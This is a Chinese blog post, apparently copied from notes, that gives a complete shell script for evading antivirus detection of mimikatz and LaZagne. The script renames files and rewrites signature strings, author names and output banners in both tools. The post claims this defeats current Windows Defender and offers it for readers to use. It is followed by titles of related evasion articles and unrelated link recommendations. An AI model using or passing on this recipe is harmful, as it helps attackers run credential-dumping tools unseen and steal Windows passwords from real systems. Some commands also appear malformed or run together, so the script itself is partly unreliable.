其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过

文章直接从笔记复制出来的,有需要的自己看情况用

git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg
find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -print0 | xargs - sed -i 's/mimikatz/windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/MIMIKATZ/WINDOWS/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Mimikatz/Windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DELPY/gweep/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Benjamin/gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/creativecommons/notcommons/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/gentilkiwi/MSOffice/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/KIWI/ONEDRIVE/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Kiwi/Onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/kiwi/onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DumpCreds/DumpCred/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/logonPasswords/logonPassword/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/ArgumentPtr/NotTodayPal/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' cd ./lmmg/lmmg/
sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c
sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c lazagne
find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done
find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find windows/ -type f -print0 | xargs - sed -i 's/lazagne/kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/LaZagne/Kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/laZagne/KMm/g' find windows/ -type f -print0 | xargs - sed -i 's/BANG/bg/g'
find windows/ -type f -print0 | xargs - sed -i 's/passwords ---------------/vp/g'
find windows/ -type f -print0 | xargs - sed -i 's/Password not found/nop/g'
find windows/ -type f -print0 | xargs - sed -i 's/=================================================================/ll/g'
find windows/ -type f -print0 | xargs - sed -i 's/########## User/lp/g'
find windows/ -type f -print0 | xargs - sed -i 's/For more information launch it again with the -v option/jj/g'

关于mimikatz lazagne免杀方法的更多相关文章

  1. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

    Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

  2. lcx源代码以及免杀的研究

    之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软.顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下. 报毒情况 因为使用 ...

  3. 2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践

    实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcod ...

  4. 2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践

    一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 ( ...

  5. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

  6. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  7. 2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践 一.实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5 ...

  8. NetSec2019 20165327 Exp3 免杀原理与实践

    NetSec2019 20165327 Exp3 免杀原理与实践 pre基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清 ...

  9. 2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践

    免杀原理与实践 目录 知识点问答 实践内容 遇到的问题 心得体会 知识点 meterpreter免杀 基础问题回答 杀软是如何检测出恶意代码的? 特征码(基于签名):模式匹配,比对特征码库 启发式:通 ...

随机推荐

  1. MongoDB 学习笔记之 $push,$each,$slice组合使用

    $push使用: 使用$push给数组添加2个新成员 db.ArrayTest.updateOne({ "name" : "Bill"},{$push: {&q ...

  2. JS时间格式CST转GMT

    转换方法:JS 时间格式CST转GMT 时区和Date:Java中的Date和时区转换

  3. C语言I博客作业03

    这个作业属于那个课程 C语言程序设计II 这个作业要求在哪里 https://edu.cnblogs.com/campus/zswxy/CST2019-2/homework/8717 我在这个课程的目 ...

  4. Bugku练习

    首先我们拿到了一个admin.exe的文件,根据惯例我先用查一下有没有加壳: ???这是怎么回事??? 我于是用了winhex打开看了一下,发现 这不就是data协议吗~~~,把后面的base64解密 ...

  5. Python+Tornado+Tampermonkey 获取某讯等主流视频网站的会员视频解析播放

    近期,<哪吒之魔童降世>在各大视频软件可以看了,然而却是一贯的套路,非会员谢绝观看!!!只能从国内那些五花八门的视频网站上找着看了,或者通过之前本人说的 Chrome 的油猴插件,传送门  ...

  6. php微信支付v3版本签名生成

    前几天需要对接微信支付卡包营销活动需要对接微信新版SDKv3版 签名生成规则,微信的官方文档里面说明的还算可以吧,不过个人觉得不太理想- -.  自己调试的时候调试了半天才找了错误原因. https: ...

  7. 洛谷 P3833 [SHOI2012]魔法树

    题目背景 SHOI2012 D2T3 题目描述 Harry Potter 新学了一种魔法:可以让改变树上的果子个数.满心欢喜的他找到了一个巨大的果树,来试验他的新法术. 这棵果树共有N个节点,其中节点 ...

  8. Selenium+PhantomJS使用时报错原因

    运行下面代码:'''PhantomJS运用''' from selenium import webdriverimport time # 通过keys模拟键盘from selenium.webdriv ...

  9. Arouter核心思路和源码详解

    前言 阅读本文之前,建议读者: 对Arouter的使用有一定的了解. 对Apt技术有所了解. Arouter是一款Alibaba出品的优秀的路由框架,本文不对其进行全面的分析,只对其最重要的功能进行源 ...

  10. flask 微电影网站

    flask简介 轻量级web应用框架 WSGI工具箱才用Werkzeug 模版引擎则使用Jinja2 Flask使用BSD授权 1.virtualenv的使用 (1)创建虚拟环境:virtualenv ...